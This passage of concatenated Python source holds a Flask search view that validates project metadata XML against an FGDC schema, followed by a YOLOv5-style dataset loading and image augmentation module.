(MasterDetails.PI.like('%'+d+'%'))).all()
length = len(courses)
# Adding Required Details to userData
userdata = []
def add_user(user):
userdata.append(user)
for i in courses:
user = {}
user["name"] = i.projectTitle
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["sbId"] = i.sb_id
user["summary"] = i.summary
add_user(user)
return render_template('searchTree.html',
query=d, courses=courses,
length=length, userdata=userdata)
@bp.route('/searchBar/<query>', methods=['GET', 'POST'])
@login_required
def searchBar(query):
current_user.search_form = SearchForm()
d = query
if(len(d) == 0):
userdata = ["Please Enter The Keyword To Search"]
return render_template('search_results.html',
userdata=userdata, length=len(d))
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
(MasterDetails.PI.like('%'+d+'%'))).all()
length = len(courses)
# Adding Required Details to userData
userdata = []
def add_user(user):
userdata.append(user)
for i in courses:
user = {}
user["name"] = i.projectTitle
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["size"] = i.projectSize
add_user(user)
return render_template('search_results.html',
query=d, courses=courses,
length=length, userdata=userdata)
@bp.route('/searchBack/<query>', methods=['GET', 'POST'])
@login_required
def searchBack(query):
current_user.search_form = SearchForm()
d = query
if(len(d) == 0):
userdata = ["Please Enter The Keyword To Search"]
return render_template('search_results.html',
userdata=userdata, length=len(d))
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
(MasterDetails.PI.like('%'+d+'%'))).all()
length = len(courses)
# Adding Required Details to userData
userdata = []
def add_user(user):
userdata.append(user)
for i in courses:
user = {}
user["name"] = i.projectTitle
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["size"] = i.projectSize
add_user(user)
return render_template('searchTree.html',
query=d, courses=courses,
length=length, userdata=userdata)
@bp.route('/searchTable/<query>', methods=['GET', 'POST'])
@login_required
def searchTable(query):
current_user.search_form = SearchForm()
d = query
if(len(d) == 0):
userdata = ["Please Enter The Keyword To Search"]
return render_template('search_results.html',
userdata=userdata,
length=len(d))
courses = MasterDetails.query.filter(
(MasterDetails.projectTitle.like('%'+d+'%')) |
(MasterDetails.PI.like('%'+d+'%'))).all()
length = len(courses)
userdata = []
def add_user(user):
userdata.append(user)
sheet = {}
for i in courses:
user = {}
user["name"] = i.projectTitle
user['sb_id'] = i.sb_id
user["casc"] = i.casc
user["Fy"] = str(i.fy)
user["ctitle"] = i.title
user["size"] = i.projectSize
user['pi_list'] = i.PI
user['summary'] = i.summary
user['url'] = i.url
user['ctitle'] = i.title
user['xml'] = i.xml_urls
if(i.xml_urls == ''):
# print("no data")
user['xml'] = "Metadata Unavailable for this DataItem"
user['error'] = "No Validations"
user['curl'] = "No Xml Link Found"
else:
doc = etree.parse(path_to_static +
'FGDC-BDP/fgdc-std-001.1-1999.xsd')
schema = etree.XMLSchema(doc)
# parse the url and convert to xml file
url1 = str(i.xml_urls)
URL = url1.split(',')[0]
user['curl'] = URL
# print(URL)
try:
response = requests.get(URL)
with open(path_to_static + 'feed.xml', 'wb') as file:
file.write(response.content)
# Schema to be validated.
custom = etree.parse(path_to_static + 'feed.xml')
# Validate Schema
user['xml'] = schema.validate(custom)
# print(schema.validate(custom))
def get_project(error):
# return error.path.split('/')[-1]
return error.message.split(':')[0].split(" ")[1].strip()
# If errors, we will find it in schema.error_log
user['error'] = []
for error in schema.error_log:
# Mutiple attribute available in error
# 'column', 'domain', 'domain_name',
# 'filename', 'level', 'level_name'
# 'line', 'message', 'path', 'type', 'type_name'
error1 = (str(error.message),
"Error in Line Number: " + str(error.line))
# print('ErrorMessage',error.message)
user['error'].append(error1)
result = {}
for error1 in schema.error_log:
project = get_project(error1)
if project not in result:
result[project] = 0
result[project] += 1
# print(error.message)
# print(result)
user['countError'] = str(result)
except Exception:
user['cxml'] = "URL Associated with this \
Data Item is not working"
# print("url failed")
if current_user.is_authenticated:
if current_user.access_level > 0:
# Parse excel sheet
sheet_name = get_sheet_name(i.casc)
if sheet_name:
values = []
for vals in workbook[sheet_name].values:
if vals[0] is None:
break
values.append(vals)
sheet = parse_values(values)
try:
# DMP Status
i.dmp_status = sheet[i.sb_id]['DMP Status']
if i.dmp_status is None or\
i.dmp_status.isspace() or\
i.dmp_status == "":
i.dmp_status = "No DMP status provided"
user["dmp_status"] = i.dmp_status
# History
i.history = sheet[i.sb_id]['History']
if i.history is None or\
i.history.isspace() or\
i.history == "":
i.history = "No data steward history provided"
user['history'] = i.history
# Potential Products
i.potential_products = sheet[i.sb_id]['Expected Products']
if i.potential_products is None or\
i.potential_products.isspace() or\
i.potential_products == "":
i.potential_products = "No data potential\
products provided"
user['potential_products'] = i.potential_products
except KeyError:
i.dmp_status = "Project not currently tracked \
by Data Steward"
i.history = "Project not currently tracked by \
Data Steward"
i.potential_products = "Project not currently tracked by \
Data Steward"
else:
i.dmp_status = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
user["dmp_status"] = i.dmp_status
i.history = "Please email administrators at"\
+ " {} to receive access privileges to view "\
.format(current_app.config['ADMINS'][0])\
+ "this content."
user['history'] = i.history
i.potential_products = "Please email "\
+ "administrators at {} to receive access "\
.format(current_app.config['ADMINS'][0])\
+ "privileges to view this content."
user['potential_products'] = i.potential_products
else:
i.dmp_status = "Please login to view this content."
i.history = "Please login to view this content."
i.potential_products = "Please login to view this content."
i.file_breakdown = []
add_user(user)
return render_template('searchTableChart.html', query=d, courses=courses,
length=length, userdata=userdata)
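# A minimal standalone sketch of the FGDC validation step used above
# (illustrative only; the XSD path and metadata URL are placeholders):
#
#   from lxml import etree
#   import requests
#
#   schema = etree.XMLSchema(etree.parse('FGDC-BDP/fgdc-std-001.1-1999.xsd'))
#   doc = etree.fromstring(requests.get('https://example.org/metadata.xml').content)
#   if not schema.validate(doc):
#       for err in schema.error_log:
#           print(err.line, err.message)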
# adding new code Burst and Trends.html
@bp.route('/trends', methods=['GET', 'POST'])
def trends():
return render_template('trends.html')
@bp.route('/bursts', methods=['GET', 'POST'])
def bursts():
return render_template('bursts.html')
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
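# Hedged usage sketch (not executed here); 'opt' and 'hyp' stand in for the
# caller's argparse namespace and hyperparameter dict:
#
#   dataloader, dataset = create_dataloader('data/train.txt', imgsz=640,
#                                           batch_size=16, stride=32, opt=opt,
#                                           hyp=hyp, augment=True)
#   for imgs, targets, paths, shapes in dataloader:
#       pass  # imgs: b x 3 x H x W tensor, targets: n x 6 [img_idx, cls, xywh]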
class LoadImages: # for inference
def __init__(self, path, img_size=640):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
assert nf > 0, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
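# The cache maps each image path to [labels (n x 5 float32: cls, x, y, w, h in
# normalized xywh), (width, height)], plus a 'hash' entry over the file sizes
# so a changed dataset triggers a re-cache in __init__ above.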
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
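# Labels are collated into a single (total_boxes x 6) tensor instead of being
# padded per image; column 0 carries the batch index written above so
# build_targets() can map each box back to its image.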
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
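# Illustrative call (the gains here are placeholders, not values taken from
# this file): augment_hsv(img, hgain=0.015, sgain=0.7, vgain=0.4)
# Each HSV channel is remapped in place through a 256-entry LUT, so the input
# array is modified directly and nothing is returned.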
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
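# Hedged example of the return values for a 480x640 frame and new_shape=640
# with auto=True (padding rounded to a multiple of 64 per axis):
#   img, ratio, (dw, dh) = letterbox(np.zeros((480, 640, 3), np.uint8), 640)
#   # img.shape == (512, 640, 3); ratio == (1.0, 1.0); (dw, dh) == (0.0, 16.0)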
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
